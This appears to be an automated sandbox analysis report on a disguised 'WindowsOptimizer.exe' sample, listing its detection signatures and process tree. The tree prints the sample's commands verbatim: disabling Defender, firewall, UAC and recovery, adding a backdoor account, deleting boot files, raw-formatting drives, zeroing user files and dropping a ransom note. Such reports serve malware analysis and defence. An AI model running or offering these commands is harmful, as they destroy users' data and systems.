Analysis

  • max time kernel
    2s
  • max time network
    3s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09-11-2024 21:27

General

  • Target

    WindowsOptimizer.exe

  • Size

    254KB

  • MD5

    5aaa262b518a3417e028e001152c9236

  • SHA1

    6d1cda51302d760509822b502a8f980537d17cb0

  • SHA256

    d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b

  • SHA512

    722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca

  • SSDEEP

    3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
          PID:1772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:2748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          • Modifies registry key
          PID:2808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop wuauserv
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:3004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\system32\sc.exe
          sc config wuauserv start=disabled
          3⤵
          • Launches sc.exe
          PID:2728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:2736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
          3⤵
          • Disables RegEdit via registry modification
          • Modifies registry key
          PID:2876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2720
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
          3⤵
            PID:2764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
            3⤵
              PID:2856
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2892
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} recoveryenabled No
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:2944
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1576
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} bootstatuspolicy ignoreallfailures
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:2740
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
            2⤵
              PID:2716
              • C:\Windows\system32\net.exe
                net user TrojanUser0 ComplexPass123! /add
                3⤵
                  PID:2632
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
                    4⤵
                      PID:2204
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
                  2⤵
                    PID:2656
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
                    2⤵
                      PID:2600
                      • C:\Windows\system32\cipher.exe
                        cipher /E /A /S:C:\Users\Admin\Desktop
                        3⤵
                          PID:1956
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                        2⤵
                          PID:2596
                          • C:\Windows\system32\fsutil.exe
                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AssertNew.cmd"
                            3⤵
                              PID:2680
                            • C:\Windows\system32\fsutil.exe
                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\BlockConfirm.mp4"
                              3⤵
                                PID:2472
                              • C:\Windows\system32\fsutil.exe
                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CheckpointCopy.vbs"
                                3⤵
                                  PID:2196
                                • C:\Windows\system32\fsutil.exe
                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteMove.cab"
                                  3⤵
                                    PID:2884
                                  • C:\Windows\system32\fsutil.exe
                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteUpdate.mpe"
                                    3⤵
                                      PID:2232
                                    • C:\Windows\system32\fsutil.exe
                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertApprove.wvx"
                                      3⤵
                                        PID:2220
                                      • C:\Windows\system32\fsutil.exe
                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ConvertToStep.js"
                                        3⤵
                                          PID:2312
                                        • C:\Windows\system32\fsutil.exe
                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CopyShow.xlsx"
                                          3⤵
                                            PID:1644
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DebugShow.ps1"
                                            3⤵
                                              PID:2888
                                            • C:\Windows\system32\fsutil.exe
                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DisableClose.docx"
                                              3⤵
                                                PID:536
                                              • C:\Windows\system32\fsutil.exe
                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\EnterComplete.asx"
                                                3⤵
                                                  PID:2352
                                                • C:\Windows\system32\fsutil.exe
                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ExportResume.au"
                                                  3⤵
                                                    PID:2780
                                                  • C:\Windows\system32\fsutil.exe
                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportConfirm.doc"
                                                    3⤵
                                                      PID:1912
                                                    • C:\Windows\system32\fsutil.exe
                                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ImportExport.pot"
                                                      3⤵
                                                        PID:2372
                                                      • C:\Windows\system32\fsutil.exe
                                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\InstallDisconnect.DVR-MS"
                                                        3⤵
                                                          PID:660
                                                        • C:\Windows\system32\fsutil.exe
                                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinOut.cfg"
                                                          3⤵
                                                            PID:840
                                                          • C:\Windows\system32\fsutil.exe
                                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\LimitAdd.xml"
                                                            3⤵
                                                              PID:2052
                                                            • C:\Windows\system32\fsutil.exe
                                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeProtect.mov"
                                                              3⤵
                                                                PID:1508
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PingConvertTo.mp4v"
                                                                3⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:352
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopUnregister.potm"
                                                                3⤵
                                                                  PID:908
                                                                • C:\Windows\system32\fsutil.exe
                                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoClose.xlsx"
                                                                  3⤵
                                                                    PID:688
                                                                  • C:\Windows\system32\fsutil.exe
                                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RenameSync.docx"
                                                                    3⤵
                                                                      PID:2584
                                                                    • C:\Windows\system32\fsutil.exe
                                                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectInitialize.mov"
                                                                      3⤵
                                                                        PID:2332
                                                                      • C:\Windows\system32\fsutil.exe
                                                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SendRevoke.vsx"
                                                                        3⤵
                                                                          PID:1048
                                                                        • C:\Windows\system32\fsutil.exe
                                                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SetClose.AAC"
                                                                          3⤵
                                                                            PID:2456
                                                                          • C:\Windows\system32\fsutil.exe
                                                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartUninstall.bmp"
                                                                            3⤵
                                                                              PID:2284
                                                                            • C:\Windows\system32\fsutil.exe
                                                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepHide.mpeg"
                                                                              3⤵
                                                                                PID:2268
                                                                              • C:\Windows\system32\fsutil.exe
                                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopJoin.lock"
                                                                                3⤵
                                                                                  PID:2248
                                                                                • C:\Windows\system32\fsutil.exe
                                                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StopRedo.vdx"
                                                                                  3⤵
                                                                                    PID:3008
                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SuspendDebug.asp"
                                                                                    3⤵
                                                                                      PID:3012
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
                                                                                    2⤵
                                                                                      PID:2616
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
                                                                                      2⤵
                                                                                        PID:2668
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
                                                                                        2⤵
                                                                                          PID:2336
                                                                                          • C:\Windows\system32\bcdedit.exe
                                                                                            bcdedit /delete {bootmgr} /f
                                                                                            3⤵
                                                                                            • Modifies boot configuration data using bcdedit
                                                                                            PID:2652
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
                                                                                          2⤵
                                                                                            PID:1620
                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                              bcdedit /delete {default} /f
                                                                                              3⤵
                                                                                              • Modifies boot configuration data using bcdedit
                                                                                              PID:2972
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c mountvol X: /s
                                                                                            2⤵
                                                                                              PID:1744
                                                                                              • C:\Windows\system32\mountvol.exe
                                                                                                mountvol X: /s
                                                                                                3⤵
                                                                                                  PID:2224
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
                                                                                                2⤵
                                                                                                  PID:2488
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c mountvol X: /d
                                                                                                  2⤵
                                                                                                    PID:2452
                                                                                                    • C:\Windows\system32\mountvol.exe
                                                                                                      mountvol X: /d
                                                                                                      3⤵
                                                                                                      • Enumerates connected drives
                                                                                                      PID:1792
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
                                                                                                    2⤵
                                                                                                      PID:1788
                                                                                                      • C:\Windows\system32\format.com
                                                                                                        format C: /fs:raw /q /y
                                                                                                        3⤵
                                                                                                          PID:2880
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
                                                                                                        2⤵
                                                                                                          PID:1712
                                                                                                          • C:\Windows\system32\format.com
                                                                                                            format D: /fs:raw /q /y
                                                                                                            3⤵
                                                                                                            • Enumerates connected drives
                                                                                                            PID:2144
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
                                                                                                          2⤵
                                                                                                            PID:1280
                                                                                                            • C:\Windows\system32\format.com
                                                                                                              format E: /fs:raw /q /y
                                                                                                              3⤵
                                                                                                              • Enumerates connected drives
                                                                                                              PID:1996
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
                                                                                                            2⤵
                                                                                                              PID:2896
                                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                                bcdedit /delete {current} /f
                                                                                                                3⤵
                                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                                PID:2344
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                              2⤵
                                                                                                                PID:2176
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                2⤵
                                                                                                                  PID:2016
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                  2⤵
                                                                                                                    PID:2252
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                    2⤵
                                                                                                                      PID:748
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                      2⤵
                                                                                                                        PID:2172
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                        2⤵
                                                                                                                          PID:1272
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                          2⤵
                                                                                                                            PID:1604
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                            2⤵
                                                                                                                              PID:904
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                              2⤵
                                                                                                                                PID:2428
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                                                2⤵
                                                                                                                                  PID:2228
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
                                                                                                                                  2⤵
                                                                                                                                    PID:2216
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
                                                                                                                                    2⤵
                                                                                                                                      PID:560
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
                                                                                                                                      2⤵
                                                                                                                                        PID:2212
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
                                                                                                                                        2⤵
                                                                                                                                          PID:2528
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
                                                                                                                                          2⤵
                                                                                                                                            PID:3028
                                                                                                                                        • C:\Windows\system32\efsui.exe
                                                                                                                                          efsui.exe /efs /keybackup
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:2852

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads